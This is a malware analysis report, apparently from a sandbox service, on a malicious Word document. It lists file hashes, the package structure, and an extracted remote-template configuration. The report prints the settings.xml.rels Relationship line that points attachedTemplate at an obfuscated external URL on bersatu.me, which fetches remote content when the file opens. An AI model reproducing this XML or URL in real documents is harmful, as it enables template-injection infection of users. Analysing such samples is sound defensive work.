Malicious
Malicious

f72e6695b9c92e4dabacd607ceccd4b4

MS Word Document
|
MD5: f72e6695b9c92e4dabacd607ceccd4b4
|
Size: 60.24 KB
|
application/msword

Print
Infection Chain
Summary by MalvaGPT
Characteristics
Hash
 Hash Value
MD5
f72e6695b9c92e4dabacd607ceccd4b4
Sha1
b811ce32b82a8879e79d099c70ed28c06765010f
Sha256
18c13bdcb3f94ccf6d99ce3f0df1b7ac1d077f861106130ae730efdacb11202f
Sha384
fa5fc90431555b35998024e2fe12d959ea1975183f961785eb84aa4413ddcdf854c25acaaff216b6f69247d2ac090620
Sha512
8b0a47b0cf2634da2e0ece48907ed5a32c031a9833c9552a579004d3692e3453a90f311c0eef66d17463577bd5d45eda0709a4fa7e2313e2dae23198a79f3362
SSDeep
1536:iqH6SGUkbPVhPwTmSypv4C1nYLOijqVxzLvG9KNrwgQyD2ze+T:ilSUbTwXyB4Qn6PKzzGKMqXq
TLSH
E643F15EA0ED14E8D2026277D8BD7E68F72C71478253A103E5321E6DEFFF8C9961A205
File Structure
f72e6695b9c92e4dabacd607ceccd4b4
Malicious
[Content_Types].xml
_rels
.rels
word
Malicious
_rels
Malicious
document.xml.rels
header2.xml.rels
footer2.xml.rels
settings.xml.rels
Malicious
document.xml
footnotes.xml
footer2.xml
footer3.xml
header3.xml
endnotes.xml
header2.xml
media
image1.emf
image2.emf
embeddings
Microsoft_Office_Excel_Worksheet1.xlsx
[Content_Types].xml
_rels
.rels
xl
_rels
workbook.xml.rels
workbook.xml
sharedStrings.xml
worksheets
_rels
sheet1.xml.rels
sheet1.xml
theme
theme1.xml
styles.xml
printerSettings
printerSettings1.bin
customXml
itemProps2.xml
_rels
item3.xml.rels
item2.xml.rels
item1.xml.rels
item1.xml
itemProps1.xml
itemProps3.xml
item3.xml
item2.xml
docProps
thumbnail.wmf
core.xml
app.xml
custom.xml
Microsoft_Office_Excel_Worksheet2.xlsx
[Content_Types].xml
xl
_rels
workbook.xml.rels
workbook.xml
styles.xml
worksheets
sheet2.xml
sheet1.xml
theme
theme1.xml
sharedStrings.xml
printerSettings
printerSettings1.bin
docProps
thumbnail.wmf
core.xml
app.xml
custom.xml
theme
theme1.xml
settings.xml
styles.xml
webSettings.xml
fontTable.xml
docProps
app.xml
core.xml
Malware Configuration - Remote Template
Config. Field
 Value
Target

https://wishyouthebestpeoplesentiretiimeforfigureoutthebestsolutionsgiveme.docx@bersatu.me/5LgsMd
Path

settings.xml.rels
XPath

/Relationships/Relationship
Outer XML

<Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/attachedTemplate" Target="https://wishyouthebestpeoplesentiretiimeforfigureoutthebestsolutionsgiveme.docx@bersatu.me/5LgsMd" TargetMode="External" xmlns="http://schemas.openxmlformats.org/package/2006/relationships" />
Artefacts
Name
 Value
Remote Template - Highly Suspicious

https://wishyouthebestpeoplesentiretiimeforfigureoutthebestsolutionsgiveme.docx@bersatu.me/5LgsMd
f72e6695b9c92e4dabacd607ceccd4b4 (60.24 KB)
An error has occurred. This application may no longer respond until reloaded. Reload 🗙